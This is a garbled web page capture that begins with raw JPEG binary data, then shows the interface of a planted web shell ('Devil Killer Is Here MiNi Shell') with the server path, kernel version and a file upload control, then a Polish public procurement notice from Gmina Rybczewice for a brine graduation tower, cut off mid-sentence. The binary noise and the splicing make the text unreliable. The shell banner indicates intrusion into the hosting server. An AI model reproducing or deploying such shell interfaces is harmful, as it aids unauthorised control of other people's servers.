JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211220/0032382602-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych w formule „zaprojektuj i wybuduj” dla zadania pn.: „Wykonanie tężni solankowej z utwardzonym placem przeznaczonym na zajęcia artystyczne” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RYBCZEWICE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Rybczewice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020003</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">119</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybczewice Drugie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-065</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">815844461</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">815844474</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@rybczewice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://rybczewice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych w formule „zaprojektuj i wybuduj” dla zadania pn.: „Wykonanie tężni solankowej z utwardzonym placem przeznaczonym na zajęcia artystyczne” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c4082ef-61d9-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00323826</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00031079/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Wykonanie robót budowlanych w formule „zaprojektuj i wybuduj” dla zadania pn.: „Wykonanie tężni solankowej z utwardzonym placem przeznaczonym na zajęcia artystyczne”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich 2014 – 2020. „Kształtowanie przestrzeni publicznej” w ramach działania „Podstawowe usługi i odnowa wsi na obszarach wiejskich” objętego PROW na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.rybczewice.pl/index.php?id=144 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal (nazwa adresata Urząd Gminy Rybczewice,<br/>identyfikator adresata: /ugrybczewice/SkrytkaESP) oraz poczty elektronicznej adres email<br/>Zamawiającego zamowienia@rybczewice.pl.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyła0nia i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal<br/>(https://miniportal.uzp.gov.pl/WarunkiUslugi), Instrukcji użytkownika systemu miniPortal-ePuap<br/>(https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf) oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP) -<br/>https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>6. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej<br/>SWZ. Podczas komunikacji przez miniPortal i ePuap należy posługiwać się ID postępowania<br/>wskazanym w załączniku do SWZ oraz dostępnym na stronie postępowania<br/>w miniPortalu (UWAGA - podczas komunikacji nie należy podawać ID postępowania, który generuje się<br/>automatycznie w ogłoszeniu o zamówieniu). Dane postępowanie można wyszukać również na Liście<br/>wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania.<br/>7. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym,<br/>a Wykonawcami (za wyjątkiem składania ofert) w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego<br/>przez miniPortal. We wszelkiej korespondencji związanej<br/>z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub<br/>ID postępowania, o którym mowa w ust. 6).<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email zamowienia@rybczewice.pl.<br/>9. Dokumenty elektroniczne (za wyjątkiem ofert), składane są przez Wykonawcę za pośrednictwem<br/>„Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w ust. 8 adres email.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://www.bip.rybczewice.pl/index.php?id=144</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Administratorem danych osobowych jest:<br/>Wójt Gminy Rybczewice<br/>2) Inspektor ochrony danych osobowych w Urzędzie Gminy Rybczewice, adres e-mail:<br/>inspektor@cbi24.pl<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celach związanych z<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez<br/>przeprowadzenia negocjacji.<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. ustawy Pzp.<br/>5) dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy.<br/>6) obowiązek podania danych osobowych bezpośrednio dotyczących osób fizycznych (w szczególności<br/>osób fizycznych skierowanych do realizacji zamówienia, podwykonawcy oraz podmiotu trzeciego<br/>będącego osobą fizyczną, osób fizycznych prowadzących jednoosobową działalność gospodarczą,<br/>pełnomocnika podwykonawcy oraz podmiotu trzeciego będącego osobą fizyczną, np. dane osobowe zamieszczone w pełnomocnictwie, członka organu zarządzającego oraz podmiotu będącego osobą<br/>fizyczną), jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp.<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO.<br/>8) osoby fizyczne posiadają:<br/>a) Na podstawie art. 15 RODO prawo dostępu do danych osobowych ich dotyczących.<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych. Skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, w przypadku uznania,<br/>że przetwarzanie danych osobowych narusza przepisy RODO.<br/>9) nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>b) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.20.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia Kształtowanie przestrzeni publicznej w gminie Rybczewice poprzez wykonanie tężni solankowej oraz placu na zajęcia artystyczne”. Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich 2014 – 2020. „Kształtowanie przestrzeni publicznej” w ramach działania „Podstawowe usługi i odnowa wsi na obszarach wiejskich” objętego PROW na lata 2014-2020.<br/><br/>4.2 Przedmiot zamówienia realizowany jest w formule „zaprojektuj i wybuduj”. kompleksowe wykonanie dokumentacji projektowej (oraz przeprowadzenia na jej podstawie realizacji inwestycji) tężni solankowej z utwardzonym placem przeznaczonym na zajęcia artystyczne zlokalizowanej w m. Rybczewice Drugie, gm. Rybczewice, dz. Nr ewid. 786/10, 786/11 obręb 00009 Rybczewice. Dokumentacja obejmuję budowę tężni solankowej z utwardzonym placem przeznaczonym na zajęcia plastyczne w skład którego wchodzi budowa:<br/>· Tężni solankowej o wymiarach:<br/>- długość do 10,0 m,<br/>- szerokość do 5,0 m,<br/>- wysokość do 5,0 m.<br/>· Zbiornika na solankę o poj. do 5000l,<br/>· Zbiornika retencyjnego o poj. do 5000l,<br/>· Utwardzenia terenu klinkierową cegłą brukową lub kostką granitową do 380 m2,<br/>· Elementów małej architektury (ławeczki 10 szt., stoliki 4 szt. , kosze na śmieci 4 szt.),<br/> OZE (montaż instalacji odnawialnych źródeł energii: lampy solarne umieszczone w podłożu do oświetlenia terenu utwardzonego)<br/>· Przyłącza lub zewnętrzne instalacje sanitarne, energetyczne.<br/><br/>Szczegółowy opis przedmiotu zamówienia zawiera program funkcjonalno-użytkowy Załącznik Nr 9 do SWZ,. <br/>Niniejszy program funkcjonalno-użytkowy opisuje wymagania i oczekiwania Zamawiającego stawiane przedmiotowej inwestycji.<br/>Program funkcjonalno-użytkowy wraz z załącznikami stanowi podstawę do sporządzenia oferowanej kalkulacji na kompleksową realizację zadania obejmującego wykonanie dokumentacji projektowej wraz ze wszystkimi wymaganymi prawem uzgodnieniami, uzyskanie decyzji pozwolenia na budowę oraz wszelkie prace budowlano-montażowe, przeprowadzenie szkolenia użytkowników w zakresie obsługi instalacji tężni.<br/>W dokumentacji projektowej należy uwzględnić wszelkie uzgodnienia wymagane przepisami prawa budowlanego (zgodnie z warunkami określonymi w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity z 2013r. – Dz.U.poz.1409, z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tekst jednolity – Dz.U. z 2015r. Poz. 1422)<br/>Dokumentację techniczną należy sporządzić zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 25 kwietnia 2012r. (Dz.U. z 2012 r. poz. 462)<br/>Projektant niezbędne materiały do projektowania pozyskuje od Zamawiającego.<br/>Planowana inwestycja zlokalizowana jest na terenie nie objętym miejscowym planem zagospodarowania przestrzennego. Przy projektowaniu należy uwzględnić treść i zalecenia Decyzji o ustaleniu lokalizacji inwestycji celupublicznego wydane przez Wójta Gminy Rybczewice z dnia 07.09.2018r. znak. BGP.6733.7.3.2018.<br/><br/>Zamawiający nie dopuszcza składania ofert częściowych. Zamawiający nie dokonuje podziału na części z następujących powodów: <br/>Zamówienie jest realizowane w formule „zaprojektuj i wybuduj”, co predysponuje zamówienie bez dokonywania podziału na części. Ponadto, podział zamówienia na części spowodowałby poniesienie nadmiernych kosztów wykonania zamówienia. Dwie odrębne umowy spowodowałyby trudności w skoordynowaniu działań różnych wykonawców wraz z ewentualnymi podwykonawcami realizujących poszczególne części zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-08</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu. <br/>15.2	Oferty oceniane będą na podstawie następujących kryteriów: <br/>15.2.1	cena brutto – waga 60 % <br/>15.2.2	okres gwarancji – waga 30 % <br/>15.2.3	Doświadczenie osób skierowanych od realizacji zamówienia – waga 10% <br/>15.3 Ocena ofert zostanie dokonana wg poniższego wzoru: P = Pc + Pg + Pd gdzie: <br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>Pc – liczba punktów w kryterium „cena brutto”, <br/>Pg – liczba punktów w kryterium „okres gwarancji”, <br/>Pd – liczba punktów przyznana w kryterium „doświadczenie osób…” <br/>15.4 Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach: <br/>15.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru: Pc = (Cn : Cb) x 60 gdzie: <br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie, <br/>Cb – cena brutto oferty badanej. <br/>15.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany okres gwarancji w następujący sposób: <br/>a)	Okres gwarancji 12 m-cy – 0 pkt, <br/>b)	Okres gwarancji 24 m-ce – 5 pkt, <br/>c)	Okres gwarancji 36 m-ce – 10 pkt, <br/>d)	Okres gwarancji 48 m-cy – 20 pkt, <br/>e)	Okres gwarancji 60 m-cy – 30 pkt, <br/>UWAGA: W przypadku, gdy w formularzu oferty nie zostanie zaznaczona żadna wartość przy kryterium gwarancji, Zamawiający przyjmie minimalną wartość określoną w tym kryterium równą 12 miesięcy. <br/>15.4.3 Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 15.2.3 SWZ. Przyznanie punktów za wykazane doświadczenie osób odbędzie się w następujący sposób: Doświadczenie osoby wskazanej w ofercie jako odpowiedzialnej za kierowanie robotami budowlanymi (liczone w ilości zrealizowanych projektów/zadań w zakresie inżynierii hydrotechnicznej): <br/>a)	Kierownik robót budowlanych 1 projektu/zadania – 2 pkt, <br/>b)	Kierownik robót budowlanych 2 projektów/zadań – 4 pkt, <br/>c)	Kierownik robót budowlanych 3 projektów/zadań – 6 pkt, <br/>d)	Kierownik robót budowlanych 4 projektów/zadań – 8 pkt, <br/>e)	Kierownik robót budowlanych 5 i więcej projektów/zadań – 10 pkt <br/>UWAGA: W przypadku, gdy wykonawca pozostawi formularz ofertowy niewypełniony w zakresie kryterium doświadczenia Kierownika robót budowlanych, oferta otrzyma punktów 0 (słownie: zero) w tym kryterium. <br/>15.5	Na potrzeby kryterium oceny ofert Wykonawca nie może wskazać innej osoby niż osoba wskazana na etapie późniejszym w celu potwierdzenia spełniania warunku, o którym mowa w punkcie 7.2.2 lit. b SWZ, (osoba wskazana do oceny w kryterium jest osobą wskazaną na potrzeby spełniania warunku, którą Wykonawca dysponuje lub będzie dysponował w trakcie realizacji zamówienia). <br/>15.6	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 15.3 SWZ. <br/>15.7	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wskazanej w ofercie jako odpowiedzialnej za kierowanie robotami budowlanymi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub 